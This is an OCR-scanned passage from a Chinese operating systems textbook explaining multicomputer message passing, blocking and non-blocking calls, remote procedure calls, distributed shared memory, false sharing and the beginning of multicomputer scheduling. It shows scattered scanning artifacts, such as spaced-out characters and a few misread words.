在 最 简化 的 情形 下 ， 所 提供 的 通信 服务 可 以 减少 到 两 个 ( 库 ) 调用 ， 一 个 用 于 发 送 消 息 ， 另 一 个 用 
于 接收 消息 。 发 送 一 条 消息 的 调用 可 能 是 

send(dest, &mptr); 


而 接收 消息 的 调用 可 能 是 


receive(addr, &mptr); 


前 者 把 由 mptr 参 数 所 指向 的 消息 发 送 给 由 dest 参 数 所 标识 的 进程 ， 并 且 引 起 对 调用 者 的 阻塞 ， 直 到 该 消 
息 被 发 出 。 后 者 引起 对 调用 者 的 阻塞 ， 直 到 消息 到 达 。 该 消息 到 达 后 ， 被 复制 到 由 mptr 参 数 所 指向 的 缓 
冲 区 ， 并 且 撤 销 对 调用 者 的 阻塞 。addr 参 数 指定 了 接收 者 要 监听 的 地 址 。 这 两 个 过 程 及 其 参数 有 许多 可 
能 的 变种 。 

一 个 问题 是 如 何 编 址 。 由 于 多 计算 机 是 静态 的 ，CPU 数 目 是 固定 的 ， 所 以 处 理 编 址 问题 的 最 便利 的 
办 法 是 使 addr 由 两 部 分 地 址 组 成 ， 其 中 一 部 分 是 CPU 编号 ， 另 一 部 分 是 在 这 个 已 编 址 的 CPU 上 的 一 个 进 
程 或 端口 的 编号 。 在 这 种 方式 中 ， 每 个 CPU 可 以 管理 自己 的 地 址 而 不 会 有 潜在 的 冲突 。 

2. 阻塞 调用 和 非 阻 塞 调用 

上 面 所 叙述 的 调用 是 阻塞 调用 (有 时 称 为 同步 调用 ) 。 当 一 个 进程 调用 send 时 ， 它 指定 一 个 目标 以 
及 用 以 发 送 消息 到 该 目标 的 一 个 缓冲 区 。 当 消息 发 送 时 ， 发 送 进程 被 阻塞 ( 挂 起 )。 在 消息 已 经 完全 发 
送出 去 之 前 ， 不 会 执行 跟随 在 调用 send 后 面 的 指令 ， 如 图 8-19a 所 示 。 类 似 地 ， 在 消息 真正 接收 并 且 放 入 
由 参数 指定 的 消息 缓冲 区 之 前 ， 对 receive 的 调用 也 不 会 把 控制 返回 。 在 receive 中 进程 保持 挂 起 状态 ， 直 
到 消息 到 达 为 止 ， 这 其 至 有 可 能 等 待 若干 小 时 。 在 有 些 系统 中 ， 接 收 者 可 以 指定 希望 从 谁 处 接收 消息 ， 
在 这 种 情况 下 接收 者 就 保持 阻塞 状态 ， 直 到 来 自 那个 发 送 者 的 消息 到 达 为 止 。 
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图 8-19 a) 一 个 阻塞 的 send 调 用 ，b) 一 个 非 阻塞 的 send 调 用 


相对 于 阻塞 调用 的 另 一 种 方式 是 非 阻塞 调用 (有 时 称 为 异步 调用 )。 如 果 send 是 非 阻塞 的 ， 在 消息 
发 出 之 前 ， 它 立即 将 控制 返回 给 调用 者 。 这 种 机 制 的 优点 是 发 送 进程 可 以 继续 运算 ， 与 消息 传送 并 行 ， 
而 不 是 让 CPU 空闲 (假设 没有 其 他 可 运行 的 进程 )。 通 常 是 由 系统 设计 者 做 出 在 阻塞 原 语 和 非 阻塞 原 语 
之 间 的 选择 (或 者 使 用 这 种 原 语 或 者 另 一 种 原 语 ) ， 当 然 也 有 少数 系统 中 两 种 原 语 同时 可 用 ， 而 让 用 户 
决定 其 喜好 。 

但 是 ， 非 阻塞 原 语 所 提供 的 性 能 优点 被 其 严重 的 缺点 所 抵消 了 : 直到 消息 被 送出 发 送 者 才能 修改 消 
息 缓 冲 区 。 进 程 在 传输 过 程 中 重 写 消息 的 后 果 是 如 此 可 怕 以 致 不 得 不 慎重 考虑 。 更 糟 的 是 ， 发 送 进程 不 
知道 传输 何 时 会 结束 ， 所 以 根本 不 知道 什么 时 候 重用 缓冲 区 是 安全 的 。 不 可 能 永远 避免 再 碰 缓 冲 区 。 

有 三 种 可 能 的 解决 方案 。 第 一 种 方案 是 ， 让 内 核 复制 这 个 消息 到 内 部 的 内 核 缓冲 区 ， 然 后 让 进程 继 
续 ， 如 图 8-19b 所 示 。 从 发 送 者 的 视角 来 看 ， 这 个 机 制 与 阻塞 调用 相同 : 只 要 进程 获得 控制 ， 就 可 以 随 
意 重用 缓冲 区 了 。 当 然 ， 消 息 还 没有 发 送出 去 ， 但 是 发 送 者 是 不 会 被 这 种 情况 所 妨碍 的 。 这 个 方案 的 缺 
点 是 对 每 个 送出 的 消息 都 必须 将 其 从 用 户 空间 复制 进 内 核 空间 。 面 对 大 量 的 网 络 接口 ， 消 息 最 终 要 复制 
进 硬 件 的 传输 缓冲 区 中 ， 所 以 第 一 次 的 复制 实质 上 是 浪费 。 额 外 的 复制 会 明显 地 降低 系统 的 性 能 。 

第 二 种 方案 是 ， 当 消息 发 送 之 后 中 断 发 送 者 ， 告 知 缓冲 区 又 可 以 使 用 了 。 这 里 不 需要 复制 。 从 而 市 
省 了 时 间 ， 但 是 用 户 级 中 断 使 编写 程序 变 得 环 手 ， 并 可 能 会 要 处 理 竞 争 条 件 ， 这 些 都 使 得 该 方案 难以 设 
计 并 且 几 乎 无 法 调试 。 

第 三 种 方案 是 ， 让 缓冲 区 写 时 复制 (copy on write) ， 也 就 是 说 ， 在 消息 发 送出 去 之 前 将 其 标记 为 只 
读 。 在 消息 发 送出 去 之 前 ， 如 果 缓 冲 区 被 重用 ， 则 进行 复制 。 这 个 方案 的 问题 是 ， 除 非 缓冲 区 被 孤立 在 
自己 的 页 面 上 ， 否 则 对 临近 变量 的 写 操作 也 会 导致 复制 。 此 外 ， 需 要 有 额外 的 管理 ， 因 为 这 样 的 发 送 消 
息 行 为 隐 含 着 对 页 面 读 / 写 状态 的 影响 。 最 后 ， 该 页 面 迟 早 会 再 次 被 写 人 ， 它 会 触发 一 次 不 再 必要 的 复制 。 

这 样 ， 在 发 送 端的 选择 是 

1) 阻塞 发 送 〈CPU 在 消息 传输 期 间 空闲 ) 。 

2) 带 有 复制 操作 的 非 阻塞 发 送 (CPU 时 间 浪 费 在 额外 的 复制 上 ) 。 

3) 带 有 中 断 操作 的 非 阻塞 发 送 (造成 编程 困难 )。 

4) 写 时 复制 (最 终 可 能 也 会 需要 额外 的 复制 )。 

在 正常 条 件 下 ， 第 一 种 选择 是 最 好 的 ， 特 别 是 在 有 多 线程 的 情况 下 ， 此 时 当 一 个 线程 由 于 试图 发 送 被 阻 
塞 后 ， 其 他 线程 还 可 以 继续 工作 。 它 也 不 需要 管理 任何 内 核 缓冲 区 。 而 且 ， 正 如 将 图 8-19a 和 图 8-19b 进 
行 比较 所 见 到 的 ， 如 果 不 需 要 复制 ， 通 常 消息 会 被 更 快 地 发 出 。 
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请 注意 ， 有 必要 指出 ， 有 些 作者 使 用 不 同 的 判别 标准 区 分 同步 和 异步 原 语 。 另 一 种 观点 认为 ， 只 有 
发 送 者 一 直 被 阻塞 到 消息 已 被 接收 并 且 有 响应 发 送 回来 时 为 止 ， 才 是 同步 的 (Andrews，1991)。 但 是 ， 
在 实时 通信 领域 中 ， 同 步 有 着 其 他 的 含义， 不 幸 的 是 ， 它 可 能 会 导致 混淆 。 

正如 send 可 以 是 阻塞 的 和 非 阻塞 的 一 样 ，receive 也 同样 可 以 是 阻塞 的 和 非 阻 塞 的 。 阻 塞 调 用 就 是 挂 
起 调用 者 直到 消息 到 达 为 止 。 如 果 有 多 线程 可 用 ， 这 是 一 种 简单 的 方法 。 另 外 ， 非 阻塞 receive 只 是 通知 内 
核 缓冲 区 所 在 的 位 置 ， 并 几乎 立即 返回 控制 。 可 以 使 用 中 断 来 告知 消息 已 经 到 达 。 然 而 ， 中 断 方式 编程 
困难 ， 并 且 速 度 很 慢 ， 所 以 也 许 对 于 接收 者 来 说 ,更 好 的 方法 是 使 用 一 个 过 程 poll 轮 询 进来 的 消息 。 该 过 
程 报告 是 否 有 消息 正在 等 待 。 若 是 ， 调 用 者 可 调用 get_message， 它 返回 第 一 个 到 达 的 消息 。 在 有 些 系统 
中 ， 编 译 器 可 以 在 代码 中 合适 的 地 方 插 入 poll 调 用 ， 不 过 ， 要 掌握 以 怎样 的 频 度 使 用 poll 则 是 需要 技巧 的 。 

还 有 另 一 个 选择 ， 其 机 制 是 在 接收 者 进程 的 地 址 空间 中 ， 一 个 消息 的 到 达 自 然 地 引起 一 个 新 线程 的 
创建 。 这 样 的 线程 称 为 弹出 式 线程 (pop-up thread) 。 这 个 线程 运行 一 个 预定 义 的 过 程 ， 其 参数 是 一 个 指 
向 进来 消息 的 指针 。 在 处 理 完 这 个 消息 之 后 ， 该 线程 直接 退出 并 被 自动 撤销 。 

这 一 想法 的 变种 是 ， 在 中 断 处 理 程序 中 直接 运行 接收 者 代码 ， 从 而 避免 了 创建 弹出 线程 的 麻烦 。 要 
使 这 个 方法 更 快 ， 消 息 自身 可 以 带 有 该 处 理 程序 的 句柄 (handler)， 这 样 当 消 息 到 达 时 ， 只 在 少数 几 个 
指令 中 可 以 调用 处 理 程序 。 这 样 做 的 最 大 好 处 在 于 再 也 不 需要 复制 了 。 处 理 程序 从 接口 板 取 到 消息 并 且 
即时 处 理 。 这 种 方式 称 为 主动 消息 (active messages; Von Eicken 等 人 ，1992)。 由 于 每 条 消息 中 都 有 处 
理 程序 的 句柄 ， 主 动 消息 方式 只 能 在 发 送 者 和 接收 者 彼此 完全 信任 的 条 件 下 工作 。 


8.2.4 远程 过 程 调用 

尽管 消息 传递 模型 提供 了 一 种 构造 多 计算 机 操作 系统 的 便利 方式 ， 但 是 它 有 不 可 救 药 的 缺陷 : 构造 
所 有 通信 的 范 型 (paradigm) 都 是 输入 /输出 。 过 程 send 和 receive 基本 上 在 做 IO 工作 ， 而 许多 人 认为 
VO 就 是 一 种 错误 的 编程 模型 。 

这 个 问题 很 早 就 为 人 所 知 ， 但 是 一 直 没 有 什么 进展 ， 直 到 Birrell 和 Nelson 在 其 论文 (Birrell 和 
Nelson, 1984) 中 引进 了 一 种 完全 不 同 的 方法 来 解决 这 个 问题 。 尽 管 其 思想 是 令 人 吃惊 的 简单 (曾经 有 
人 想到 过 )， 但 其 含义 却 相 当 精 妙 。 在 本 节 中 ， 我 们 将 讨论 其 概念 、 实 现 、 优 点 以 及 缺点 。 

简 言 之 ，Birrell 和 Nelson 所 建议 的 是 ， 人 允许 程序 调用 位 于 其 他 CPU 中 的 过 程 。 当 机 器 1 的 进程 调用 
机 器 2 的 过 程 时 ， 在 机 器 1 中 的 调用 进程 被 挂 起 ， 在 机 器 2 中 被 调用 的 过 程 执 行 。 可 以 在 参数 中 传递 从 调 
用 者 到 被 调用 者 的 信息 ， 并 且 可 在 过 程 的 处 理 结果 中 返回 信息 。 根 本 不 存在 对 程序 员 可 见 的 消息 传递 或 
IO。 这 种 技术 即 是 所 谓 的 远程 过 程 调用 (Remote Procedure Call，RPC) ， 并 且 已 经 成 为 大 量 多 计算 机 
的 软件 的 基础 。 习 惯 上 ， 称 发 出 调用 的 过 程 为 客户 机 ， 而 称 被 调用 的 过 程 为 服务 器 ， 我 们 在 这 里 也 将 采 
用 这 些 名 称 。 

RPC 背 后 的 思想 是 尽 可 能 使 远程 过 程 调 用 像 本 地 调用 。 在 最 简单 的 情形 下 ， 要 调用 一 个 远程 过 程 ， 
客户 程序 必须 被 绑 定 在 一 个 称 为 客户 端 存根 (client stub) 的 小 型 库 过 程 上 ， 它 在 客户 机 地 址 空间 中 代 
表 服 务 器 过 程 。 类 似 地 ， 服 务 器 程序 也 绑 定 在 一 个 称 为 服务 器 端 存根 (server stub) 的 过 程 上 。 这 些 过 
程 隐藏 了 这 样 一 个 事实 ， 即 从 客户 机 到 服务 器 的 过 程 调 用 并 不 是 本 地 调用 。 

进行 RPC 的 实际 步骤 如 图 8-20 所 示 。 第 1 步 是 客户 机 调用 客户 端 存根 。 该 调用 是 一 个 本 地 调用 ， 其 
参数 以 通常 方式 压 入 栈 内 。 第 2 步 是 客户 端 存根 将 有 关 参 数 打 包 成 一 条 消息 ， 并 进行 系统 调用 来 发 出 该 
消息 。 这 个 将 参数 打包 的 过 程 称 为 编排 (marshaling) 。 第 3 步 是 内 核 将 该 消息 从 客户 机 发 给 服务 器 。 第 4 
步 是 内 核 将 接收 进来 的 消息 传送 给 服务 器 端 存 根 (通常 服务 器 端 存根 已 经 提前 调用 了 receive)。 最 后 ， 
第 5 步 是 服务 器 端 存根 调 用 服务 器 过 程 。 应 答 则 是 在 相反 的 方向 沿 着 同一 步骤 进行 。 

这 里 需要 说 明 的 关键 是 由 用 户 编写 的 客户 机 过 程 ， 只 进行 对 客户 端 存根 的 正常 (本地) 调用 ， 而 客 
户 端 存根 与 服务 器 过 程 同 名 。 由 于 客户 机 过 程 和 客户 端 存根 在 同一 个 地 址 空间 ， 所 以 有 关 参 数 以 正常 方 
式 传 递 。 类 似 地 ， 服 务 器 过 程 由 其 所 在 的 地 址 空间 中 的 一 个 过 程 用 它 所 期 望 的 参数 进行 调用 。 对 服务 器 
过 程 而 言 ， 一 切 都 很 正常 。 通 过 这 种 方式 ， 不 采用 带 有 send 和 receive 的 IO ， 通 过 伪造 一 个 普通 的 过 程 调 
用 而 实现 了 远程 通信 。 
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图 8-20 进行 远程 过 程 调 用 的 步骤 。 存 根 用 灰色 表示 


实现 相关 的 问题 

无 论 RPC 的 概念 是 如 何 优雅 ， 但 是 “在 草 从 中 仍然 有 几 条 蛇 隐藏 着 ”"。 一 大 条 就 是 有 关 指 针 参 数 的 
使 用 。 通 常 ， 给 过 程 传递 一 个 指针 是 不 存在 问题 的 。 由 于 两 个 过 程 都 在 同一 个 虚拟 地 址 空间 中 ， 所 以 被 
调用 的 过 程 可 以 使 用 和 调用 者 同样 的 方式 来 运用 指针 。 但 是 ， 由 于 客户 机 和 服务 器 在 不 同 的 地 址 空间 中 ， 
所 以 用 RPC 传 递 指针 是 不 可 能 的 。 

在 某 些 情形 下 ， 可 以 使 用 一 些 技巧 使 得 传递 指针 成 为 可 能 。 假 设 第 一 个 参数 是 一 个 指针 ， 它 指向 一 
个 整数 k。 客 户 端 存根 可 以 编排 x 并 把 它 发 送 给 服务 器 。 然 后 服务 器 端 存 根 创建 一 个 指向 的 指针 并 把 它 
传递 给 服务 器 过 程 ， 这 正如 服务 器 所 期 望 的 一 样 。 当 服务 器 过 程 把 控制 返回 给 服务 器 端 存 根 后 ， 后 者 把 
人 k 送 回 客户 机 ， 这 里 新 的 人 覆盖 了 原来 旧 的 ， 只 是 因为 服务 器 修改 了 它 。 实 际 上 ， 通 过 引用 调用 (call-by- 
reference) 的 标准 调用 序列 被 复制 -恢复 (copy-restore) 所 替代 了 。 然 而 不 幸 的 是 ， 这 个 技巧 并 不 是 总 
能 正常 工作 的 ， 例 如 ， 如 果 要 把 指针 指向 一 幅 图 像 或 其 他 的 复杂 数据 结构 就 不 行 。 由 于 这 个 原因 ， 对 于 
被 远程 调用 的 过 程 而 言 ， 必 须 对 参数 做 出 某 些 限 制 。 

第 二 个 问题 是 ， 对 于 弱 类 型 的 语言 ， 如 C 语 言 ， 编 写 一 个 过 程 用 于 计算 两 个 矢量 (数组 ) 的 内 积 且 
不 规定 其 任何 一 个 矢量 的 大 小 ， 这 是 完全 合法 的 。 每 个 矢量 可 以 由 一 个 指定 的 值 所 终止 ， 而 只 有 调用 者 
和 被 调用 的 过 程 掌 握 该 值 。 在 这 样 的 条 件 下 ， 对 于 客户 端 存 根 而 言 ， 基 本 上 没有 可 能 对 这 种 参数 进行 编 
HE: 没有 办 法 能 确定 它们 有 多 大 。 

第 三 个 问题 是 ， 参 数 的 类 型 并 不 总 是 能 够 推导 出 的 ， 甚 至 不 论 是 从 形式 化 规约 还 是 从 代码 自身 。 这 
方面 的 一 个 例子 是 printf， 其 参数 的 数量 可 以 是 任意 的 〈 至 少 一 个 ) ， 而 且 它 们 的 类 型 可 以 是 整形 、 短 整 
形 、 长 整形 、 字 符 、 字 符 串 、 各 种 长 度 的 浮 点 数 以 及 其 他 类 型 的 任意 混合 。 试 图 把 printf 作 为 远程 过 程 
调用 实际 上 是 不 可 能 的 ， 因 为 C 是 如 此 的 宽松 。 然 而 ， 如 果 有 一 条 规则 说 假如 你 不 使 用 C 或 者 C++ 来 进行 
编程 才能 使 用 RPC， 那 么 这 条 规则 是 不 会 受 欢迎 的 。 

第 四 个 问题 与 使 用 全 局 变量 有 关 。 通 常 ， 调 用 者 和 被 调用 过 程 除 了 使 用 参数 之 外 ， 还 可 以 通过 全 局 
变量 通信 。 如 果 被 调用 过 程 此 刻 被 移 到 远程 机 器 上 ， 代 码 将 失效 ， 因 为 全 局 变量 不 再 是 共享 的 了 。 

这 里 所 叙述 的 问题 并 不 表示 RPC 就 此 无 望 了 。 事 实 上 ，RPC 已 经 被 广泛 地 使 用 ， 不 过 在 实际 中 为 了 
使 RPC 正 常 工作 需要 有 一 些 限 制 和 仔细 的 考虑 。 


8.2.5 分 布 式 共享 存储 器 

虽然 RPC 有 它 的 吸引 力 ， 但 即便 是 在 多 计算 机 里 ， 很 多 程序 员 仍 旧 偏 爱 共享 存储 器 的 模型 并 且 愿 意 
使 用 它 。 让 人 相当 吃惊 的 是 ， 采 用 一 种 称 为 分 布 式 共享 存储 器 (Distributed Shared Memory, DSM) (Li, 
1986; Li 和 Hudak，1989) 的 技术 ， 就 有 可 能 很 好 地 保留 共享 存储 器 的 幻觉 ， 尽 管 这 个 共享 存储 器 实际 
并 不 存在 。 虽 然 这 是 一 个 老话 题 ， 但 相关 研究 仍然 很 多 (Cai 和 Strazdins，2012，Choi 和 Jung，2013， 
Ohnishi 和 Yoshida，2011)。 研 究 DSM 技 术 是 很 有 用 的 ， 它 不 仅 展示 了 分 布 式 系统 的 复杂 性 和 其 中 的 许 
多 问题 , 而 且 这 个 想法 本 身 也 很 有 影响 力 。 有 了 DSM, 每 个 页 面 都 位 于 如 图 8-1b 所 示 的 某 一 个 存储 器 中 。 
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每 台 机 器 有 其 自己 的 虚拟 内 存 和 页 表 。 当 一 个 CPU 在 一 个 它 并 不 拥有 的 页 面 上 进行 LOAD 和 STORE 时 ， 
会 陷 人 到 操作 系统 当中 。 然 后 操作 系统 对 该 页 面 进行 定位 ， 并 请 求 当前 持 有 该 页 面 的 CPU 解除 对 该 页 面 
的 映射 并 通过 互连网 络 发 送 该 页 面 。 在 该 页 面 到 达 时 ， 页 面 被 映射 进来 ， 于 是 出 错 指令 重新 启动 。 事 实 
上 ， 操 作 系统 只 是 从 远程 RAM 中 而 不 是 从 本 地 磁盘 中 满足 了 这 个 缺 页 异常 。 对 用 户 而 言 ， 机 器 看 起 来 
拥有 共享 存储 器 。 

实际 的 共享 存储 器 和 DSM 之 间 的 差别 如 图 8-21 所 示 。 在 图 8-21a 中 ， 是 一 台 配 有 通过 硬件 实现 的 物 
理 共 享 存储 器 的 真正 的 多 处 理 机 。 在 图 8-21b 中 ， 是 由 操作 系统 实现 的 DSM。 在 图 8-21c 中 ， 我 们 看 到 另 
一 种 形式 的 共享 存储 器 ， 它 通过 更 高 层次 的 软件 实现 。 在 本 章 的 后 面部 分 ， 我 们 会 讨论 第 三 种 方式 ， 不 
过 现在 还 是 专注 于 讨论 DSM。 


机 器 1 机 器 2 机 器 1 机 器 2 机 器 1 机 器 2 





图 8-21 实现 共享 存储 器 的 不 同 层次 : a) 硬件 ，b) 操 作 系 统 ，c) 用 户 层 软件 


先 考 察 一 些 DSM 的 工作 细节 。 在 DSM 系 统 中 ， 地 址 空间 被 划分 为 页 面 (page) ， 这 些 页 面 分 布 在 系 
统 中 的 所 有 节点 上 。 当 一 个 CPU 引用 一 个 非 本 地 的 地 址 时 ， 就 产生 一 个 陷阱 ，DSM 软 件 调 取 包 含 该 地 址 
的 页 面 并 重新 开始 出 错 指令 。 该 指令 现在 可 以 完整 地 执行 了 。 这 一 概念 如 图 8-22a 所 示 ， 该 系统 配 有 16 
个 页 面 的 地 址 空间 ，4 个 节点 ， 每 个 节点 能 持 有 6 个 页 面 。 

在 这 个 例子 中 ， 如 果 CPU 0 引用 的 指令 或 数据 在 页 面 (、2、5 或 9 中 ， 那 么 引用 在 本 地 完成 。 引 用 其 
他 的 页 面 会 导致 陷 人 。 例 如 ， 对 页 面 10 的 引用 会 导致 陷 人 到 DSM 软 件 ， 该 软件 把 页 面 10 从 节点 1 移 到 节 
点 0， 如 图 8-22b 所 示 。 

1. 复制 

对 基本 系统 的 一 个 改进 是 复制 那些 只 读 页 面 ， 如 程序 代码 、 只 读 常 量 或 其 他 只 读数 据 结构 ， 它 可 以 
明显 地 提高 性 能 。 举 例 来 说 ， 如 果 在 图 8-22 中 的 页 面 10 是 一 段 程序 代码 ，CPU 0 对 它 的 使 用 可 以 导致 将 
一 个 副本 送 往 CPU 0， 从 而 不 必 使 CPU 1 的 原 有 存储 器 被 破坏 或 干扰 ， 如 图 8-22c 所 示 。 在 这 种 方式 中 ， 
CPU 0 和 CPU 1 两 者 可 以 按 需 要 经 常 同时 引用 页 面 10， 而 不 会 产生 由 于 引用 不 存在 的 存储 器 页 面 而 导致 
的 陷阱 。 

另 一 种 可 能 是 ， 不 仅 复制 只 读 页 面 ， 而 且 复制 所 有 的 页 面 。 只 要 有 读 操 作 在 进行 ， 实 际 上 在 只 读 页 
面 的 复制 和 可 读 写 页 面 的 复制 之 间 不 存在 差别 。 但 是 ， 如 果 一 个 被 复制 的 页 面 突然 被 修改 了 ， 就 必须 采 
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取 必 要 的 措施 来 避免 多 个 不 一 致 的 副本 存在 。 如 何 吕 免 不 一 致 性 将 在 下 面 几 节 中 进行 讨论 。 

由 16 个 页 面 组 成 的 全 局 共享 的 虚拟 存储 器 

Le dalla rele bil el 
a TS 

i ee A 





存储 器 





图 8-22 a) 分 布 在 四 台 机 器 中 的 地 址 空间 页 面 ; b) 在 CPU 1 引用 页 面 10 后 的 情形 ，c) 如 果 页 面 10 是 只 读 的 并 
且 使 用 了 复制 的 情形 


2. 伪 共享 

在 某 些 关 键 方式 上 DSM 系 统 与 多 处 理 机 类 似 。 在 这 两 种 系统 中 ， 当 引用 非 本 地 存储 器 字 时 ， 从 该 
字 所 在 的 机 器 上 取 包 含 该 字 的 一 块 内存 ， 并 放 到 进行 引用 的 (分别 是 内 存储 器 或 高 速 缓存 ) 相关 机 器 上 。 
一 个 重要 的 设计 问题 是 应 该 调 取 多 大 一 块 。 在 多 处 理 机 中 , 其 高 速 缓存 块 的 大 小 通常 是 32 字 节 或 64 字 节 ， 
这 是 为 了 避免 占用 总 线 传输 的 时 间 过 长 。 在 DSM 系 统 中 ， 块 的 单位 必须 是 页 面 大 小 的 整数 倍 (因为 
MMU 以 页 面 方式 工作 )， 不 过 可 以 是 1 个 、2 个 、4 个 或 更 多 个 页 面 。 事 实 上 ， 这 样 做 就 模拟 了 一 个 更 大 
尺寸 的 页 面 。 

对 于 DSM 而 言 ， 较 大 的 页 面 大 小 有 优点 也 有 缺点 。 其 最 大 的 优点 是 ， 因 为 网 络 传输 的 启动 时 间 是 
相当 长 的 , 所 以 传递 4096 字 节 并 不 比 传输 1024 个 字 节 多 花费 多 少时 间 。 在 有 大 量 的 地 址 空间 需要 移动 时 ， 
通过 采用 大 单位 的 数据 传输 ， 通 常 可 减少 传输 的 次 数 。 这 个 特性 是 非常 重要 的 ， 因 为 许多 程序 表现 出 引 
用 上 的 局 部 性 ， 其 含义 是 如 果 一 个 程序 引用 了 某 页 中 的 一 个 字 ， 很 可 能 在 不 久 的 将 来 它 还 会 引用 同一 个 
页 面 中 其 他 字 。 

另 一 方面 ， 大 页 面 的 传输 造成 网 络 长 期 占用 ， 阻 塞 了 其 他 进程 引起 的 故障 。 还 有 ， 过 大 的 有 效 页 面 
引起 了 另 一 个 问题 ， 称 为 伪 共 享 (false sharing) ， 如 图 8-23 所 示 。 图 8-23 中 一 个 页 面 中 含有 两 个 无 关 的 
共享 变量 A 和 B。 进 程 1 大 量 使 用 A， 进 行 读 写 操作 。 类 似 地 ， 进 程 2 经 常 使 用 B。 在 这 种 情形 下 ， 含 有 这 
两 个 变量 的 页 面 将 在 两 台 机 器 中 来 回 地 传送 。 

这 里 的 问题 是 ， 尽 管 这 些 变量 是 无 关 的 ， 但 它们 碰巧 在 同一 个 页 面 内 ， 所 以 当 某 个 进程 使 用 其 中 一 
个 变量 时 ， 它 也 得 到 另 一 个 。 有 效 页 面 越 大 ， 发 生 伪 共享 的 可 能 性 也 越 高 ， 相 反 ， 有 效 页 面 越 小 ， 发 生 
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伪 共 享 的 可 能 性 也 越 少 。 在 普通 的 虚拟 内 存 系统 中 不 存在 类 似 的 现象 。 






A 和 B 是 不 相关 的 共享 变量 ， 它 
们 恰巧 在 同一 个 页 面 上 


图 8-23 含有 两 个 无 关 变 量 的 页 面 的 伪 共享 


理解 这 个 问题 并 把 变量 放 在 相应 的 地 址 空间 中 的 高 明 编译 器 能 够 帮助 减少 伪 共享 并 改善 性 能 。 但 是 ， 
说 起 来 容易 做 起 来 难 。 而 且 ， 如 果 伪 共享 中 节点 1 使 用 某 个 数组 中 的 一 个 元 素 ， 而 节点 2 使 用 同一 数组 中 
的 另 一 个 元 素 ， 那 么 即使 再 高 明 的 编译 器 也 没有 办 法 消除 这 个 问题 。 

3. 实现 顺序 一 致 性 

如 果 不 对 可 写 页 面 进 行 复制 ， 那 么 实现 一 致 性 是 没有 问题 的 。 每 个 可 写 页 面 只 对 应 有 一 个 副本 ， 在 
需要 时 动态 地 来 回 移动 。 由 于 并 不 是 总 能 提前 了 解 哪些 页 面 是 可 写 的 ， 所 以 在 许多 DSM 系 统 中 ， 当 一 个 
进程 试图 读 一 个 远程 页 面 时 ， 则 复制 一 个 本 地 副本 ， 在 本 地 和 远程 各 自 对 应 的 MMU 中 建立 只 读 副本 。 
只 要 所 有 的 引用 都 做 读 操作 ， 那 么 一 切 正常 。 

但 是 ， 如 果 有 一 个 进程 试图 在 一 个 被 复制 的 页 面 上 写 入 ， 带 在 的 一 致 性 问题 就 会 出 现 ， 因 为 只 修改 
一 个 副本 却 不 管 其 他 副本 的 做 法 是 不 能 接受 的 。 这 种 情形 与 在 多 处 理 机 中 一 个 CPU 试 图 修改 存在 于 多 个 
高 速 缓存 中 的 一 个 字 的 情况 有 类 似 之 处 。 在 多 处 理 机 中 的 解决 方案 是 ， 要 进行 写 的 CPU 首先 将 一 个 信和 号 
放 到 总 线 上 ， 通 知 所 有 其 他 的 CPU 丢弃 该 高 速 缓存 块 的 副本 。 这 里 的 DSM 系 统 以 同样 的 方式 工作 。 在 对 
一 个 共享 页 面 进行 写 人 之 前 ， 先 向 所 有 持 有 该 页 面 副 本 的 CPU 发 出 一 条 消息 ， 通 知 它们 解除 映射 并 丢弃 
该 页 面 。 在 其 所 有 解除 映射 等 工作 完成 之 后 ， 该 CPU 便 可 以 进行 写 操作 了 。 

在 有 详细 约束 的 情况 下 ， 人 允许 可 写 页 面 的 多 个 副本 存在 是 有 可 能 的 。 一 种 方法 是 允许 一 个 进程 获得 
在 部 分 虚拟 地 址 空间 上 的 一 把 锁 ， 然 后 在 被 锁 住 的 存储 空间 中 进行 多 个 读 写 操作 。 在 该 锁 被 释放 时 ， 产 
生 的 修改 可 以 传播 到 其 他 副本 上 去 。 只 要 在 一 个 给 定 的 时 刻 只 有 一 个 CPU 能 锁 住 某 个 页 面 ， 这 样 的 机 制 
就 能 保持 一 致 性 。 

另 一 种 方法 是 ， 当 一 个 潜在 可 写 的 页 面 被 第 一 次 真正 写 入 时 ， 制 作 一 个 “干净 ”的 副本 并 保存 在 发 
出 写 操作 的 CPU 上 。 然 后 可 在 该 页 上 加 锁 ， 更 新 页 面 ， 并 释放 锁 。 稍 后 ， 当 一 个 远程 机 器 上 的 进程 试图 
获得 该 页 面 上 的 锁 时 ， 先 前 进行 写 操作 的 CPU 将 该 页 面 的 当前 状态 与 “干净 ”副本 进行 比较 并 构造 一 个 
有 关 所 有 已 修改 的 字 的 列表 ， 该 列表 接着 被 送 往 获 得 锁 的 CPU， 这 样 它 就 可 以 更 新 其 副本 页 面 而 不 用 废 
FE (Keleher A, 1994), 


8.2.6 多 计算 机 调度 

在 一 台 多 处 理 机 中 ， 所 有 的 进程 都 在 同一 个 存储 器 中 。 当 某 个 CPU 完成 其 当前 任务 后 ， 它 选择 一 个 
进程 并 运行 。 理 论 上 ， 所 有 的 进程 都 是 潜在 的 候选 者 。 而 在 一 台 多 计算 机 中 ， 情 形 就 大 不 相同 了 。 每 个 
节点 有 其 自己 的 存储 器 和 进程 集合 。CPU 1 不 能 突然 决定 运行 位 于 节点 4 上 的 一 个 进程 ， 而 不 事先 花费 相 
当 大 的 工作 量 去 获得 该 进程 。 这 种 差别 说 明 在 多 计算 机 上 的 调度 较为 容易 ， 但 是 将 进程 分 配 到 节点 上 的 
工作 更 为 重要 。 下 面 我 们 将 讨论 这 些 问题 。 

多 计算 机 调度 与 多 处 理 机 的 调度 有 些 类 似 ,但 是 并 不 是 后 者 的 所 有 算法 都 能 适用 于 前 者 。 最 简单 的 
多 处 理 机 算法 一 一 维护 就 绪 进 程 的 一 个 中 心 链表 一 一 就 不 能 工作 ， 因 为 每 个 进程 只 能 在 其 当前 所 在 的 
CPU 上 运行 。 不 过 ， 当 创建 一 个 新 进程 时 ， 存 在 着 一 个 决定 将 其 放 在 哪里 的 选择 ， 例 如 ， 从 平衡 负载 的 
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考虑 出 发 。 

由 于 每 个 节点 拥有 自己 的 进程 ， 因 此 可 以 应 用 任何 本 地 调度 算法 。 但 是 ， 仍 有 可 能 采用 多 处 理 机 的 
群 调度 ， 因 为 唯一 的 要 求 是 有 一 个 初始 的 协议 来 决定 哪个 进程 在 哪个 时 间 模 中 运行 ， 以 及 用 于 协调 时 间 
槽 的 起 点 的 某 种 方法 。 

8.2.7 负载 平衡 

需要 讨论 的 有 关 多 计算 机 调度 的 内 容 相 对 较 少 。 这 是 因为 一 旦 一 个 进程 被 指定 给 了 一 个 节点 ， 就 可 
